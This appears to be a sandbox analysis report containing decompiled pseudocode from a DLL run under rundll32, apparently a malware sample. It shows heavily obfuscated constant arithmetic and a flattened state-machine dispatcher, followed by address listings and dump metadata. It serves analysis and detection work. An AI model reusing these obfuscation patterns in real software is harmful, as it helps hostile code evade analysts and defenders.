				_v292 = _v292 ^ 0x0000125f;
				_v44 = 0x5769;
				_v44 = _v44 + 0x7821;
				_v44 = _v44 ^ 0x0040cf8a;
				_v208 = 0xa2da;
				_v208 = _v208 + 0xffffda26;
				_v208 = _v208 | 0x6bc8fc84;
				_v208 = _v208 ^ 0x6bccfd84;
				_v100 = 0x8619;
				_t893 = 0x6e;
				_v100 = _v100 / _t893;
				_v100 = _v100 ^ 0x04000138;
				_v236 = 0x85ca;
				_v236 = _v236 + 0xf775;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 | 0xc3010237;
				_v236 = _v236 ^ 0xc3090237;
				_v60 = 0x5f94;
				_v60 = _v60 + 0xffff918e;
				_v60 = _v60 ^ 0xfffff322;
				_v300 = 0xef4d;
				_v300 = _v300 | 0xf95e9216;
				_t894 = 0x1d;
				_v300 = _v300 * 0x78;
				_v300 = _v300 + 0xffffa6e4;
				_v300 = _v300 ^ 0xe4875a6c;
				_v176 = 0xcd87;
				_v176 = _v176 + 0xffff9544;
				_v176 = _v176 / _t894;
				_v176 = _v176 ^ 0x80000368;
				_v248 = 0xa869;
				_v248 = _v248 + 0xffff8a84;
				_v248 = _v248 | 0x3280cd8c;
				_t895 = 0x2c;
				_v248 = _v248 * 0x62;
				_v248 = _v248 ^ 0x5561f8ba;
				_v112 = 0xf823;
				_v112 = _v112 ^ 0xdc5ee9a3;
				_v112 = _v112 ^ 0xdc5e1183;
				_v284 = 0xd3bc;
				_v284 = _v284 + 0xffffd98b;
				_v284 = _v284 + 0x486f;
				_v284 = _v284 | 0x91fa5adb;
				_v284 = _v284 ^ 0x91fa81ff;
				_v220 = 0x23c4;
				_v220 = _v220 + 0x24bf;
				_v220 = _v220 >> 0xe;
				_v220 = _v220 ^ 0x0000397d;
				_v324 = 0x9c0e;
				_v324 = _v324 / _t895;
				_v324 = _v324 ^ 0x81dfe71b;
				_v324 = _v324 | 0x74c77561;
				_v324 = _v324 ^ 0xf5dfe4bc;
				_v244 = 0x9f78;
				_t896 = 0x30;
				_v244 = _v244 / _t896;
				_v244 = _v244 + 0xbc13;
				_v244 = _v244 + 0xffff658a;
				_v244 = _v244 ^ 0x00005446;
				_v276 = 0xb1b5;
				_v276 = _v276 >> 6;
				_t897 = 0x51;
				_v276 = _v276 * 0x2c;
				_v276 = _v276 ^ 0xbae7ac45;
				_v276 = _v276 ^ 0xbae7c01a;
				_v124 = 0x48e3;
				_v124 = _v124 / _t897;
				_v124 = _v124 ^ 0x0000464a;
				_v40 = 0xb973;
				_v40 = _v40 + 0x5be4;
				_v40 = _v40 ^ 0x0001169b;
				_v160 = 0x90d2;
				_v160 = _v160 ^ 0xc876beee;
				_v160 = _v160 ^ 0xab2ec0d4;
				_v160 = _v160 ^ 0x63589e4c;
				_v216 = 0xebb5;
				_v216 = _v216 + 0x1b6c;
				_v216 = _v216 + 0x5cd2;
				_v216 = _v216 ^ 0x000123a2;
				_v136 = 0xd2d;
				_v136 = _v136 ^ 0xde320a5a;
				_v136 = _v136 ^ 0xde322c98;
				_v316 = 0x9c31;
				_v316 = _v316 + 0x87ce;
				_v316 = _v316 >> 0xf;
				_v316 = _v316 << 0xf;
				_v316 = _v316 ^ 0x000161f3;
				_v68 = 0xaa4;
				_v68 = _v68 | 0x379a6afa;
				_v68 = _v68 ^ 0x379a4249;
				_v72 = 0x66fd;
				_v72 = _v72 ^ 0x1bf5aa39;
				_v72 = _v72 ^ 0x1bf5cfe8;
				_v240 = 0x10ca;
				_v240 = _v240 >> 2;
				_v240 = _v240 + 0x9cc9;
				_v240 = _v240 ^ 0x8ecb9aa9;
				_v240 = _v240 ^ 0x8ecb190c;
				_v80 = 0x1ce5;
				_v80 = _v80 + 0x5a3a;
				_v80 = _v80 ^ 0x000031ae;
				_v180 = 0x6dd0;
				_v180 = _v180 | 0x96bfe9d3;
				_v180 = _v180 + 0x5bad;
				_v180 = _v180 ^ 0x96c064a5;
				_v56 = 0x4ba5;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x000020d5;
				_v164 = 0xc88c;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 + 0xffffb953;
				_v164 = _v164 ^ 0xffffcdf3;
				_v172 = 0xd4f7;
				_v172 = _v172 + 0x6d56;
				_t898 = 0x71;
				_v172 = _v172 / _t898;
				_v172 = _v172 ^ 0x00007fec;
				_v64 = 0x2274;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x00042253;
				_v280 = 0xbd0e;
				_v280 = _v280 ^ 0x300005f5;
				_v280 = _v280 ^ 0x6939e5f4;
				_t899 = 0x4e;
				_v280 = _v280 * 0x37;
				_v280 = _v280 ^ 0x2b52c5dd;
				_v104 = 0xaf51;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x0057daf8;
				_v120 = 0x5a17;
				_v120 = _v120 << 7;
				_v120 = _v120 ^ 0x002d33fc;
				_v288 = 0x6e7b;
				_v288 = _v288 + 0xa186;
				_v288 = _v288 + 0xffffb015;
				_v288 = _v288 >> 2;
				_v288 = _v288 ^ 0x00005323;
				_v296 = 0x1ff6;
				_v296 = _v296 * 0x6d;
				_t900 = 0x76;
				_v296 = _v296 / _t899;
				_v296 = _v296 << 0xf;
				_v296 = _v296 ^ 0x1654878a;
				_v304 = 0x17a6;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 >> 0x10;
				_v304 = _v304 ^ 0x39a777a9;
				_v304 = _v304 ^ 0x39a71383;
				_v312 = 0xc1c5;
				_v312 = _v312 << 4;
				_v312 = _v312 / _t900;
				_t901 = 0x24;
				_v312 = _v312 / _t901;
				_v312 = _v312 ^ 0x000020a2;
				_v128 = 0xa7c2;
				_v128 = _v128 | 0x73e84681;
				_v128 = _v128 ^ 0x73e882e0;
				_v108 = 0xedc0;
				_v108 = _v108 + 0xffff38f3;
				_v108 = _v108 ^ 0x00004e88;
				_v268 = 0x4cb2;
				_v268 = _v268 + 0xffff581a;
				_t902 = 5;
				_v268 = _v268 * 0x7f;
				_v268 = _v268 / _t902;
				_v268 = _v268 ^ 0x332a7d68;
				_v48 = 0x3775;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x00003c2f;
				_v332 = 0x2e5;
				_v332 = _v332 + 0x973e;
				_v332 = _v332 + 0x582d;
				_v332 = _v332 | 0x4e46aea0;
				_v332 = _v332 ^ 0x4e46f01a;
				_v92 = 0xecb2;
				_v92 = _v92 >> 0x10;
				_v92 = _v92 ^ 0x00005860;
				_v192 = 0x76ab;
				_t903 = 0x58;
				_v192 = _v192 / _t903;
				_v192 = _v192 + 0xffffedde;
				_v192 = _v192 ^ 0xfffff039;
				_v168 = 0x569e;
				_v168 = _v168 | 0x8ce6da82;
				_v168 = _v168 ^ 0x7e552d9e;
				_v168 = _v168 ^ 0xf2b39afb;
				_v200 = 0x850f;
				_v200 = _v200 >> 2;
				_v200 = _v200 + 0xffffcd47;
				_v200 = _v200 ^ 0xfffff22a;
				_v336 = 0x9261;
				_v336 = _v336 << 0x10;
				_v336 = _v336 ^ 0x556f5d5a;
				_v336 = _v336 | 0x84e7afbb;
				_v336 = _v336 ^ 0xc7efb11f;
				_v260 = 0x9df0;
				_v260 = _v260 ^ 0x6037a460;
				_t904 = 0x6e;
				_v260 = _v260 / _t904;
				_t905 = 0x5d;
				_v260 = _v260 / _t905;
				_v260 = _v260 ^ 0x00026a3e;
				_v184 = 0x2584;
				_v184 = _v184 | 0x91f1cbbd;
				_v184 = _v184 + 0xffff1018;
				_v184 = _v184 ^ 0x91f0cf67;
				_v152 = 0x8ca9;
				_t906 = 0x4a;
				_v152 = _v152 / _t906;
				_v152 = _v152 << 4;
				_v152 = _v152 ^ 0x00006513;
				_v84 = 0x77f3;
				_v84 = _v84 + 0xffff3db1;
				_v84 = _v84 ^ 0xffffc1c9;
				_v52 = 0x587;
				_v52 = _v52 | 0x675f08fe;
				_v52 = _v52 ^ 0x675f36dd;
				_v76 = 0xbba2;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00005deb;
				_v328 = 0xf0a5;
				_v328 = _v328 | 0xb0da4f33;
				_v328 = _v328 >> 2;
				_v328 = _v328 + 0x1048;
				_v328 = _v328 ^ 0x2c36fa11;
				_v36 = 0x2a74;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00007692;
				_v188 = 0x2f66;
				_v188 = _v188 ^ 0x45e45990;
				_t907 = 0x18;
				_v188 = _v188 * 0x59;
				_v188 = _v188 ^ 0x4c6d2c94;
				_v196 = 0xbe6b;
				_v196 = _v196 | 0xf46158a2;
				_v196 = _v196 >> 0xc;
				_v196 = _v196 ^ 0x000f6213;
				_v88 = 0x4547;
				_v88 = _v88 << 1;
				_v88 = _v88 ^ 0x0000e110;
				_v96 = 0xb81;
				_v96 = _v96 | 0xae38e917;
				_v96 = _v96 ^ 0xae38b032;
				_v256 = 0x7754;
				_v256 = _v256 + 0xfa4d;
				_v256 = _v256 | 0x1efef3a7;
				_v256 = _v256 * 0xd;
				_v256 = _v256 ^ 0x92ff6df5;
				_v228 = 0xfbcd;
				_v228 = _v228 | 0x05cff199;
				_v228 = _v228 + 0xcc2;
				_v228 = _v228 ^ 0x05d05a46;
				_v320 = 0x8c88;
				_v320 = _v320 + 0xc4c7;
				_v320 = _v320 ^ 0x8fac5d5e;
				_v320 = _v320 * 0x41;
				_v320 = _v320 ^ 0x7af02945;
				_v224 = 0xc0c1;
				_v224 = _v224 >> 0xe;
				_v224 = _v224 << 0xf;
				_v224 = _v224 ^ 0x0001d04a;
				_v132 = 0x9e59;
				_v132 = _v132 | 0x8ad22999;
				_v132 = _v132 ^ 0x8ad28a97;
				_v264 = 0xdddc;
				_v264 = _v264 | 0xc797c5af;
				_v264 = _v264 << 0xc;
				_v264 = _v264 + 0xffffdbb5;
				_v264 = _v264 ^ 0x7ddf8dbd;
				_v272 = 0xbb3;
				_v272 = _v272 + 0xffffc942;
				_v272 = _v272 + 0x6fc5;
				_v272 = _v272 / _t907;
				_v272 = _v272 ^ 0x00002501;
				_v204 = 0x93cc;
				_v204 = _v204 << 9;
				_v204 = _v204 * 0x25;
				_v204 = _v204 ^ 0x2ab896dd;
				_v212 = 0x2aa;
				_v212 = _v212 << 0xf;
				_v212 = _v212 + 0xea80;
				_v212 = _v212 ^ 0x0155e81e;
				_v140 = 0x154e;
				_t908 = 0x5c;
				_v140 = _v140 / _t908;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 ^ 0x000002fd;
				_v148 = 0xb2ba;
				_v148 = _v148 >> 8;
				_v148 = _v148 + 0xffffdc87;
				_v148 = _v148 ^ 0xffffeb86;
				_v156 = 0x2cda;
				_v156 = _v156 << 8;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x0016035f;
				_v232 = 0xbd1e;
				_t909 = 0x6e;
				_v232 = _v232 / _t909;
				_v232 = _v232 >> 6;
				_v232 = _v232 << 0xa;
				_v232 = _v232 ^ 0x00003d22;
				_t910 = _v28;
				while(1) {
					L1:
					_t876 = 0xefeb7d0;
					while(1) {
						_t923 = _t911 - _t876;
						if(_t923 <= 0) {
						}
						L3:
						if(_t923 == 0) {
							_t782 = E10009B08(_v280, _v104, _t817, _v112, _v120, _t817, _v288, _a36, _v24, _v296, _v304, _t817, _v312, _v128, _a8);
							_t919 = _t919 + 0x38;
							_v340 = _t782;
							__eflags = _t782;
							_t911 =  !=  ? 0x21341eb : 0x5c03e16;
							goto L15;
						} else {
							if(_t911 == 0x17e99f4) {
								E10008DF2(_v228, _t910, _v320, _v224, _v132);
								_t919 = _t919 + 0xc;
								goto L22;
							} else {
								if(_t911 == 0x21341eb) {
									__eflags = _t815;
									if(__eflags != 0) {
										_push(0x10001244);
										_push(_v48);
										_t800 = E1001BF25(_v108, _v268, __eflags);
										_t817 = _t800;
										_v344 = _t800;
									}
									_t794 = E10003391(_a20, _t817, _t817, _t817, _v332, _v92, _v176 | _v300 | _v60 | _v236 | _v100 | _v208 | _v44 | _v292 | _v144, _v340, _v192, _v168, _v200, _t817, _v336, _t817, _v260);
									_t910 = _t794;
									_t824 = _v184;
									E1001C5F7(_t824, _v152, _v84, _v52, _v344);
									_t919 = _t919 + 0x40;
									__eflags = _t794;
									if(__eflags == 0) {
										L22:
										_t911 = 0x3b577df8;
									} else {
										_push(_t824);
										_v28 = 1;
										_t799 = E100022E8(_v76, _t910,  &_v28, _t824, _v328, _v36);
										_t919 = _t919 + 0x14;
										_v28 = _t799;
										_t911 = 0x2b165a6b;
									}
									goto L14;
								} else {
									if(_t911 == 0x5c03e16) {
										E10008DF2(_v140, _v24, _v148, _v156, _v232);
									} else {
										if(_t911 == 0x6187cef) {
											__eflags = E10006AC1(_t910, _v252, __eflags) - _v308;
											_t911 =  ==  ? 0x121268fd : 0x17e99f4;
											goto L14;
										} else {
											if(_t911 != 0xe64d539) {
												L41:
												__eflags = _t911 - 0x18f37a27;
												if(__eflags != 0) {
													while(1) {
														_t923 = _t911 - _t876;
														if(_t923 <= 0) {
														}
														goto L24;
													}
													goto L3;
												}
											} else {
												_v20 = 0x200;
												_t806 = E100157E8(0x200);
												_t916 = _t806;
												_t833 = 0x200;
												if(_t806 != 0) {
													_t834 = _v324;
													_t808 = E10007B20(_t834, _t916, _t833, _v244,  &_v20);
													_t921 = _t919 + 0xc;
													if(_t808 == 0) {
														_push(_v160);
														_push(_t834);
														_t810 = E1001CDCC(_v276, _v124, _v40, _v116, _t834, _t916);
														_t921 = _t921 + 0x18;
														_v32 = _t810;
													}
													E100091CD(_v216, _v136, _v316, _t916, _v68);
													_t919 = _t921 + 0xc;
												}
												_t911 = 0x26e9ad1b;
												L14:
												_t782 = _v340;
												L15:
												_t817 = _v344;
												goto L1;
											}
										}
									}
								}
							}
						}
						L44:
						return _t917;
						L24:
						__eflags = _t911 - 0x121268fd;
						if(_t911 == 0x121268fd) {
							__eflags = E1001676B(_t910, _a28);
							_t911 = 0x17e99f4;
							_t776 = 1;
							_t917 =  !=  ? _t776 : _t917;
							goto L40;
						} else {
							__eflags = _t911 - 0x26e9ad1b;
							if(_t911 == 0x26e9ad1b) {
								_push(_t817);
								_t779 = E100089C3(_v32, _t876, _v72, _v240, _v80, _v180, _t817, _v248);
								__eflags = _t779;
								_v24 = _t779;
								_t911 =  !=  ? 0xefeb7d0 : 0x18f37a27;
								E100091CD(_v56, _v164, _v172, _v32, _v64);
								_t919 = _t919 + 0x28;
								L40:
								_t817 = _v344;
								_t876 = 0xefeb7d0;
								goto L41;
							} else {
								__eflags = _t911 - 0x2a775466;
								if(__eflags == 0) {
									_t911 = 0xe64d539;
									continue;
								} else {
									__eflags = _t911 - 0x2b165a6b;
									if(_t911 == 0x2b165a6b) {
										__eflags = _t815;
										if(_t815 == 0) {
											_t811 = 0;
											__eflags = 0;
										} else {
											_t811 =  *((intOrPtr*)(_t815 + 4));
										}
										__eflags = _t815;
										if(_t815 == 0) {
											_t879 = 0;
											__eflags = 0;
										} else {
											_t879 =  *_t815;
										}
										_push(_t817);
										E10007D55(_v188, _t879, _a40, _v196, _v88, _t910, _t811, _v96, _v256);
										_t919 = _t919 + 0x20;
										asm("sbb esi, esi");
										_t911 = (_t911 & 0x0499e2fb) + 0x17e99f4;
										goto L14;
									} else {
										__eflags = _t911 - 0x3b577df8;
										if(_t911 != 0x3b577df8) {
											goto L41;
										} else {
											E10008DF2(_v264, _t782, _v272, _v204, _v212);
											_t919 = _t919 + 0xc;
											_t911 = 0x5c03e16;
											goto L14;
										}
									}
								}
							}
						}
						goto L44;
					}
				}
			}
































































































































                                                                        0x1000addc
                                                                        0x1000ade6
                                                                        0x1000adf0
                                                                        0x1000adf1
                                                                        0x1000adf8
                                                                        0x1000adff
                                                                        0x1000ae00
                                                                        0x1000ae07
                                                                        0x1000ae0e
                                                                        0x1000ae15
                                                                        0x1000ae1c
                                                                        0x1000ae23
                                                                        0x1000ae24
                                                                        0x1000ae25
                                                                        0x1000ae2a
                                                                        0x1000ae37
                                                                        0x1000ae3e
                                                                        0x1000ae40
                                                                        0x1000ae47
                                                                        0x1000ae49
                                                                        0x1000ae54
                                                                        0x1000ae57
                                                                        0x1000ae64
                                                                        0x1000ae6f
                                                                        0x1000ae74
                                                                        0x1000ae85
                                                                        0x1000ae88
                                                                        0x1000ae8c
                                                                        0x1000ae93
                                                                        0x1000ae9e
                                                                        0x1000aea6
                                                                        0x1000aeae
                                                                        0x1000aeb6
                                                                        0x1000aebe
                                                                        0x1000aec6
                                                                        0x1000aecb
                                                                        0x1000aed3
                                                                        0x1000aedb
                                                                        0x1000aee6
                                                                        0x1000aef1
                                                                        0x1000aef9
                                                                        0x1000af04
                                                                        0x1000af0c
                                                                        0x1000af1c
                                                                        0x1000af20
                                                                        0x1000af28
                                                                        0x1000af30
                                                                        0x1000af3b
                                                                        0x1000af46
                                                                        0x1000af51
                                                                        0x1000af5c
                                                                        0x1000af67
                                                                        0x1000af72
                                                                        0x1000af7d
                                                                        0x1000af8f
                                                                        0x1000af92
                                                                        0x1000af99
                                                                        0x1000afa4
                                                                        0x1000afac
                                                                        0x1000afb4
                                                                        0x1000afb9
                                                                        0x1000afc1
                                                                        0x1000afc9
                                                                        0x1000afd4
                                                                        0x1000afdf
                                                                        0x1000afea
                                                                        0x1000aff4
                                                                        0x1000b003
                                                                        0x1000b006
                                                                        0x1000b00a
                                                                        0x1000b012
                                                                        0x1000b01a
                                                                        0x1000b025
                                                                        0x1000b03b
                                                                        0x1000b042
                                                                        0x1000b04d
                                                                        0x1000b055
                                                                        0x1000b05d
                                                                        0x1000b06a
                                                                        0x1000b06d
                                                                        0x1000b071
                                                                        0x1000b079
                                                                        0x1000b084
                                                                        0x1000b08f
                                                                        0x1000b09a
                                                                        0x1000b0a2
                                                                        0x1000b0aa
                                                                        0x1000b0b2
                                                                        0x1000b0ba
                                                                        0x1000b0c2
                                                                        0x1000b0cd
                                                                        0x1000b0d8
                                                                        0x1000b0e0
                                                                        0x1000b0eb
                                                                        0x1000b0fb
                                                                        0x1000b0ff
                                                                        0x1000b107
                                                                        0x1000b10f
                                                                        0x1000b117
                                                                        0x1000b123
                                                                        0x1000b128
                                                                        0x1000b12e
                                                                        0x1000b136
                                                                        0x1000b13e
                                                                        0x1000b146
                                                                        0x1000b14e
                                                                        0x1000b158
                                                                        0x1000b159
                                                                        0x1000b15d
                                                                        0x1000b165
                                                                        0x1000b16d
                                                                        0x1000b181
                                                                        0x1000b188
                                                                        0x1000b193
                                                                        0x1000b19e
                                                                        0x1000b1a9
                                                                        0x1000b1b4
                                                                        0x1000b1bf
                                                                        0x1000b1ca
                                                                        0x1000b1d5
                                                                        0x1000b1e0
                                                                        0x1000b1eb
                                                                        0x1000b1f6
                                                                        0x1000b201
                                                                        0x1000b20c
                                                                        0x1000b217
                                                                        0x1000b222
                                                                        0x1000b22d
                                                                        0x1000b237
                                                                        0x1000b23f
                                                                        0x1000b244
                                                                        0x1000b249
                                                                        0x1000b251
                                                                        0x1000b25c
                                                                        0x1000b267
                                                                        0x1000b272
                                                                        0x1000b27d
                                                                        0x1000b288
                                                                        0x1000b293
                                                                        0x1000b29b
                                                                        0x1000b2a0
                                                                        0x1000b2a8
                                                                        0x1000b2b0
                                                                        0x1000b2b8
                                                                        0x1000b2c3
                                                                        0x1000b2ce
                                                                        0x1000b2d9
                                                                        0x1000b2e4
                                                                        0x1000b2ef
                                                                        0x1000b2fa
                                                                        0x1000b305
                                                                        0x1000b310
                                                                        0x1000b318
                                                                        0x1000b323
                                                                        0x1000b32e
                                                                        0x1000b336
                                                                        0x1000b341
                                                                        0x1000b34c
                                                                        0x1000b357
                                                                        0x1000b36b
                                                                        0x1000b370
                                                                        0x1000b379
                                                                        0x1000b384
                                                                        0x1000b38f
                                                                        0x1000b397
                                                                        0x1000b3a2
                                                                        0x1000b3aa
                                                                        0x1000b3b2
                                                                        0x1000b3bf
                                                                        0x1000b3c2
                                                                        0x1000b3c6
                                                                        0x1000b3ce
                                                                        0x1000b3d9
                                                                        0x1000b3e1
                                                                        0x1000b3ec
                                                                        0x1000b3f7
                                                                        0x1000b3ff
                                                                        0x1000b40a
                                                                        0x1000b412
                                                                        0x1000b41a
                                                                        0x1000b422
                                                                        0x1000b427
                                                                        0x1000b42f
                                                                        0x1000b43c
                                                                        0x1000b446
                                                                        0x1000b447
                                                                        0x1000b44b
                                                                        0x1000b450
                                                                        0x1000b458
                                                                        0x1000b460
                                                                        0x1000b465
                                                                        0x1000b46a
                                                                        0x1000b472
                                                                        0x1000b47a
                                                                        0x1000b482
                                                                        0x1000b491
                                                                        0x1000b49b
                                                                        0x1000b4a0
                                                                        0x1000b4a6
                                                                        0x1000b4ae
                                                                        0x1000b4b9
                                                                        0x1000b4c4
                                                                        0x1000b4cf
                                                                        0x1000b4da
                                                                        0x1000b4e5
                                                                        0x1000b4f0
                                                                        0x1000b4f8
                                                                        0x1000b505
                                                                        0x1000b508
                                                                        0x1000b514
                                                                        0x1000b518
                                                                        0x1000b520
                                                                        0x1000b52b
                                                                        0x1000b533
                                                                        0x1000b53e
                                                                        0x1000b546
                                                                        0x1000b54e
                                                                        0x1000b556
                                                                        0x1000b55e
                                                                        0x1000b566
                                                                        0x1000b571
                                                                        0x1000b579
                                                                        0x1000b584
                                                                        0x1000b596
                                                                        0x1000b59b
                                                                        0x1000b5a4
                                                                        0x1000b5af
                                                                        0x1000b5ba
                                                                        0x1000b5c5
                                                                        0x1000b5d0
                                                                        0x1000b5db
                                                                        0x1000b5e6
                                                                        0x1000b5f1
                                                                        0x1000b5f9
                                                                        0x1000b604
                                                                        0x1000b60f
                                                                        0x1000b617
                                                                        0x1000b61c
                                                                        0x1000b624
                                                                        0x1000b62c
                                                                        0x1000b634
                                                                        0x1000b63c
                                                                        0x1000b648
                                                                        0x1000b64d
                                                                        0x1000b657
                                                                        0x1000b65a
                                                                        0x1000b65e
                                                                        0x1000b666
                                                                        0x1000b671
                                                                        0x1000b67c
                                                                        0x1000b687
                                                                        0x1000b694
                                                                        0x1000b6a8
                                                                        0x1000b6ad
                                                                        0x1000b6b6
                                                                        0x1000b6be
                                                                        0x1000b6c9
                                                                        0x1000b6d4
                                                                        0x1000b6df
                                                                        0x1000b6ea
                                                                        0x1000b6f5
                                                                        0x1000b700
                                                                        0x1000b70b
                                                                        0x1000b716
                                                                        0x1000b71e
                                                                        0x1000b729
                                                                        0x1000b731
                                                                        0x1000b739
                                                                        0x1000b73e
                                                                        0x1000b746
                                                                        0x1000b74e
                                                                        0x1000b759
                                                                        0x1000b761
                                                                        0x1000b76c
                                                                        0x1000b777
                                                                        0x1000b78a
                                                                        0x1000b78b
                                                                        0x1000b792
                                                                        0x1000b79d
                                                                        0x1000b7a8
                                                                        0x1000b7b3
                                                                        0x1000b7bb
                                                                        0x1000b7c6
                                                                        0x1000b7d1
                                                                        0x1000b7d8
                                                                        0x1000b7e3
                                                                        0x1000b7ee
                                                                        0x1000b7f9
                                                                        0x1000b804
                                                                        0x1000b80c
                                                                        0x1000b814
                                                                        0x1000b821
                                                                        0x1000b825
                                                                        0x1000b82d
                                                                        0x1000b838
                                                                        0x1000b843
                                                                        0x1000b84e
                                                                        0x1000b859
                                                                        0x1000b861
                                                                        0x1000b869
                                                                        0x1000b876
                                                                        0x1000b87a
                                                                        0x1000b882
                                                                        0x1000b88d
                                                                        0x1000b895
                                                                        0x1000b89d
                                                                        0x1000b8a8
                                                                        0x1000b8b3
                                                                        0x1000b8be
                                                                        0x1000b8c9
                                                                        0x1000b8d1
                                                                        0x1000b8d9
                                                                        0x1000b8de
                                                                        0x1000b8e6
                                                                        0x1000b8ee
                                                                        0x1000b8f6
                                                                        0x1000b8fe
                                                                        0x1000b90c
                                                                        0x1000b910
                                                                        0x1000b918
                                                                        0x1000b923
                                                                        0x1000b933
                                                                        0x1000b93a
                                                                        0x1000b945
                                                                        0x1000b952
                                                                        0x1000b95a
                                                                        0x1000b965
                                                                        0x1000b970
                                                                        0x1000b984
                                                                        0x1000b989
                                                                        0x1000b992
                                                                        0x1000b99a
                                                                        0x1000b9a5
                                                                        0x1000b9b0
                                                                        0x1000b9b8
                                                                        0x1000b9c3
                                                                        0x1000b9ce
                                                                        0x1000b9d9
                                                                        0x1000b9e1
                                                                        0x1000b9e8
                                                                        0x1000b9f3
                                                                        0x1000ba05
                                                                        0x1000ba08
                                                                        0x1000ba0f
                                                                        0x1000ba17
                                                                        0x1000ba1f
                                                                        0x1000ba2a
                                                                        0x1000ba35
                                                                        0x1000ba35
                                                                        0x1000ba35
                                                                        0x1000ba3a
                                                                        0x1000ba3a
                                                                        0x1000ba3c
                                                                        0x1000ba3c
                                                                        0x1000ba42
                                                                        0x1000ba42
                                                                        0x1000bcd2
                                                                        0x1000bcd7
                                                                        0x1000bcda
                                                                        0x1000bcde
                                                                        0x1000bcea
                                                                        0x00000000
                                                                        0x1000ba48
                                                                        0x1000ba4e
                                                                        0x1000bc75
                                                                        0x1000bc7a
                                                                        0x00000000
                                                                        0x1000ba54
                                                                        0x1000ba5b
                                                                        0x1000bb4e
                                                                        0x1000bb50
                                                                        0x1000bb52
                                                                        0x1000bb57
                                                                        0x1000bb69
                                                                        0x1000bb70
                                                                        0x1000bb72
                                                                        0x1000bb72
                                                                        0x1000bbe6
                                                                        0x1000bbef
                                                                        0x1000bc06
                                                                        0x1000bc0d
                                                                        0x1000bc12
                                                                        0x1000bc15
                                                                        0x1000bc17
                                                                        0x1000bc7d
                                                                        0x1000bc7d
                                                                        0x1000bc19
                                                                        0x1000bc19
                                                                        0x1000bc2a
                                                                        0x1000bc41
                                                                        0x1000bc46
                                                                        0x1000bc49
                                                                        0x1000bc50
                                                                        0x1000bc50
                                                                        0x00000000
                                                                        0x1000ba61
                                                                        0x1000ba67
                                                                        0x1000be83
                                                                        0x1000ba6d
                                                                        0x1000ba73
                                                                        0x1000bb42
                                                                        0x1000bb49
                                                                        0x00000000
                                                                        0x1000ba79
                                                                        0x1000ba7f
                                                                        0x1000be4f
                                                                        0x1000be4f
                                                                        0x1000be55
                                                                        0x1000ba3a
                                                                        0x1000ba3a
                                                                        0x1000ba3c
                                                                        0x1000ba3c
                                                                        0x00000000
                                                                        0x1000ba3c
                                                                        0x00000000
                                                                        0x1000ba3a
                                                                        0x1000ba85
                                                                        0x1000ba96
                                                                        0x1000ba9d
                                                                        0x1000baa2
                                                                        0x1000baa4
                                                                        0x1000baa7
                                                                        0x1000bab8
                                                                        0x1000babc
                                                                        0x1000bac1
                                                                        0x1000bac6
                                                                        0x1000bac8
                                                                        0x1000bacf
                                                                        0x1000baeb
                                                                        0x1000baf0
                                                                        0x1000baf3
                                                                        0x1000baf3
                                                                        0x1000bb14
                                                                        0x1000bb19
                                                                        0x1000bb19
                                                                        0x1000bb1c
                                                                        0x1000bb21
                                                                        0x1000bb21
                                                                        0x1000bb25
                                                                        0x1000bb25
                                                                        0x00000000
                                                                        0x1000bb25
                                                                        0x1000ba7f
                                                                        0x1000ba73
                                                                        0x1000ba67
                                                                        0x1000ba5b
                                                                        0x1000ba4e
                                                                        0x1000be8d
                                                                        0x1000be97
                                                                        0x1000bcf2
                                                                        0x1000bcf2
                                                                        0x1000bcf8
                                                                        0x1000be39
                                                                        0x1000be3b
                                                                        0x1000be42
                                                                        0x1000be43
                                                                        0x00000000
                                                                        0x1000bcfe
                                                                        0x1000bcfe
                                                                        0x1000bd04
                                                                        0x1000bdba
                                                                        0x1000bde3
                                                                        0x1000bdef
                                                                        0x1000bdf1
                                                                        0x1000be17
                                                                        0x1000be21
                                                                        0x1000be26
                                                                        0x1000be46
                                                                        0x1000be46
                                                                        0x1000be4a
                                                                        0x00000000
                                                                        0x1000bd0a
                                                                        0x1000bd0a
                                                                        0x1000bd10
                                                                        0x1000bdb0
                                                                        0x00000000
                                                                        0x1000bd16
                                                                        0x1000bd16
                                                                        0x1000bd1c
                                                                        0x1000bd54
                                                                        0x1000bd56
                                                                        0x1000bd5d
                                                                        0x1000bd5d
                                                                        0x1000bd58
                                                                        0x1000bd58
                                                                        0x1000bd58
                                                                        0x1000bd5f
                                                                        0x1000bd61
                                                                        0x1000bd67
                                                                        0x1000bd67
                                                                        0x1000bd63
                                                                        0x1000bd63
                                                                        0x1000bd63
                                                                        0x1000bd69
                                                                        0x1000bd93
                                                                        0x1000bd98
                                                                        0x1000bd9d
                                                                        0x1000bda5
                                                                        0x00000000
                                                                        0x1000bd1e
                                                                        0x1000bd1e
                                                                        0x1000bd24
                                                                        0x00000000
                                                                        0x1000bd2a
                                                                        0x1000bd42
                                                                        0x1000bd47
                                                                        0x1000bd4a
                                                                        0x00000000
                                                                        0x1000bd4a
                                                                        0x1000bd24
                                                                        0x1000bd1c
                                                                        0x1000bd10
                                                                        0x1000bd04
                                                                        0x00000000
                                                                        0x1000bcf8
                                                                        0x1000ba3a

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "=$#S$-$-X$/<$:Z$E$FT$GE$JF$M$Tw$Vm$Z]oU$f/$fTw*$fTw*$gO$h}*3$oH$t"$t*$}9$[$]
                                                                        • API String ID: 0-299718466
                                                                        • Opcode ID: 096944ea9d644cbed8a91504d9663a7921678804b23d5a58477bd81ded31b560
